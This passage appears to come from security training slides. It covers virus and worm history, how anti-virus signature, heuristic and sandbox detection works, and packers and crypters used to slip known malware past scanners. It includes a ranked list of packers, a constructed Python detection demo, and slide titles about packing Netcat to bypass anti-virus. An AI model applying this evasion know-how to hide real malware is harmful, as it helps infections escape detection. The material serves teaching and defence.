reads local files and deletes local files. The anti-virus model does not cover file deletion
or file reading…
Viruses and Worms
Virus History
Viruses and worms are the living diseases of computers. They are the only type of software
which actually breeds itself and can even mutate completely automatically. There is no doubt
that some of the largest damages of all time to the economy were due to worm outbreaks.
Looking at the research done by the Ponemon Institute clearly proves the point.
Local Replicating Viruses
These are the old-fashioned, well known “DOS days” viruses, which infect all the
applications in the system in order to spread and survive anti-virus removal attempts
Since Windows 95, these viruses also replicate themselves into writable network shares,
and into restricted ones using the logged-on user's credentials
This virus model was almost extinct until 2004, when it was combined with spreading
through P2P file sharing: the famous “W32/Netsky.c@MM” replicated itself into the “KaZaA”
shared folder with attractive names such as “Microsoft WinXP Crack.exe”
As the virus industry is now financially motivated, the latest Trojans infect non-built-in
startup applications to load on boot without changing the system configuration or system files,
only the applications whose integrity is not verified.
Worms
The term defines a virus with non-local, wide-spread propagation techniques
It began in Windows 95 with Microsoft Office “macros” (the famous Melissa) until 2002,
when macros were disabled by default, together with its cousin, the “mass-mailing”
worm (the famous “I Love You”), which is still at the top
The new generation started in 2003 with “W32.Blaster”, followed by “W32.Sasser” and
many others
These are the really money-making and industry-shaping viruses which conquer the
world in less than a week
Today, since there are firewalls, these worms are spread in combination with browser
and email client infections in order to penetrate networks, and they use 0-day exploits such
as the unbelievable MS08-067
Antivirus
Anti-Virus is software installed on a computer endpoint or on a network content gateway
(web, email…). Its purpose is detecting and removing different kinds of malicious code, from the
virus and worm family up to Trojans and keyloggers.
Anti-Viruses have three main operation methods:
1. Signature Based (Black-List) – inspecting any accessed content and comparing strings
and code sequences from the disk and the computer's memory against a preinstalled
signature database.
2. Heuristic Based (Patterns) – inspecting the behavior of software in order to find patterns
similar to those of known general/generic malicious code. The inspection usually
focuses on:
a) Sequences of calls to different operating system functions
b) Creating file types with incorrect file extensions in unconventional paths
c) Application permission requests, such as accessing the memory space of other
applications
d) Writing into/over a large number of enclosed/pre-compiled files such as executable
files.
3. Sandbox – running applications “in space”, in a closed environment where it is possible
to inspect everything the application is about to do, without it actually being able to harm
the machine or make any changes to it.
Packers/Crypters – Bypassing Anti-Viruses
Executable compression is any means of compressing an executable file and combining the
compressed data with decompression code into a single executable. When this compressed
executable is run, the decompression code recreates the original code from the
compressed code before executing it. In most cases this happens transparently, so the
compressed executable can be used in exactly the same way as the original.
A compressed executable can be considered a self-extracting archive, where compressed data is
packaged along with the relevant decompression code in an executable file. Some compressed
executables can be decompressed to reconstruct the original executable without directly
executing them.
Originally, executable compression was created to reduce the on-disk size of executable
files, especially for downloading setup installers over the internet. Later on,
packing was used by software vendors to protect their software from reverse
engineering, thereby protecting patents and trade secrets and preventing the cracking of
licensing mechanisms.
Today executable compressors, aka “packers”, are used mostly by hackers and virus writers to
bypass anti-viruses and pass known (black-listed) malware through them. There are
several types of packers/crypters in common use:
1. Executable Compressor
a) UPX
2. Traditional Executable Packer
a) ASPack (Stolen API Bytes)
b) ASProtect
c) Stealth EXE Protector
3. Memory Protector (User Mode)
a) Silicon Realms Armadillo (CopyMem II, Debug Blocker, Nanomites)
b) PESpin (Debug Blocker)
4. Memory Protector (Kernel Mode)
a) Extreme Protector
b) Obsidium
5. Virtual Machine (with a virtual processor, i.e. a different CPU)
a) TheMida
b) VMProtect
c) MoleBox
6. Almost unfeasible to bypass
a) StarForce FrontLine ProActive
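The reason a packer gets known malware past a scanner follows from the first two anti-virus methods described in the Antivirus section: the black-listed byte sequence no longer exists in the file until the stub runs. As an added example (not code from the page or from any of the packers listed), the following Python shows a signature scan finding a marker in a plain binary, failing once the same bytes are compressed behind a stub, and an entropy heuristic still flagging the packed copy; the stub format, signature list and sample binary are all constructed.

```python
"""Signature scan vs. entropy heuristic vs. unpack-and-rescan on a toy packed file.

Added example, not code from the page: the packer stub format, the signature
database and the sample "binary" are all constructed for the demonstration.
"""
import math
import random
import zlib
from collections import Counter

# Constructed black-list, standing in for an AV signature database (method 1).
SIGNATURES = {
    "constructed-marker-A": b"CONSTRUCTED-MALWARE-MARKER-A",
    "constructed-marker-B": b"CONSTRUCTED-MALWARE-MARKER-B",
}
STUB_MAGIC = b"TOYPACK1"  # constructed header that the toy packer prepends


def signature_scan(data):
    """Method 1 (black-list): names of the known byte sequences present in data."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data, threshold=7.0):
    """Method 2 (one heuristic): compressed or encrypted bodies show high entropy."""
    return shannon_entropy(data) >= threshold


def toy_pack(executable):
    """What a packer does: emit a stub followed by the compressed original."""
    return STUB_MAGIC + zlib.compress(executable, 9)


def toy_unpack(blob):
    """Method 3 in spirit: let the stub do its work in isolation, recover the original."""
    if not blob.startswith(STUB_MAGIC):
        raise ValueError("not a toy-packed blob")
    return zlib.decompress(blob[len(STUB_MAGIC):])


def scan(data):
    """Combined verdict for one file."""
    verdict = {
        "signatures": signature_scan(data),    # finds nothing in the packed copy
        "high_entropy": looks_packed(data),    # flags the packed copy instead
        "unpacked_signatures": [],             # recovered by unpacking first
    }
    if data.startswith(STUB_MAGIC):
        verdict["unpacked_signatures"] = signature_scan(toy_unpack(data))
    return verdict


def constructed_binary():
    """Constructed sample: a low-entropy body (16 distinct byte values, so about
    4 bits/byte) with a black-listed marker embedded in the middle."""
    rng = random.Random(7)
    body = bytes(rng.choice(range(16)) for _ in range(4000))
    return b"MZ" + body[:2000] + SIGNATURES["constructed-marker-A"] + body[2000:]


if __name__ == "__main__":
    plain = constructed_binary()
    packed = toy_pack(plain)
    print("plain :", scan(plain), round(shannon_entropy(plain), 2))
    print("packed:", scan(packed), round(shannon_entropy(packed), 2))
```

A real packer's stub is native code rather than zlib, which is why production scanners emulate or sandbox the stub instead of calling a decompressor, but the detection gap it opens is the one shown here.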
Netcat – Original – Less than Packed
Bypassing Antivirus – Netcat * MEW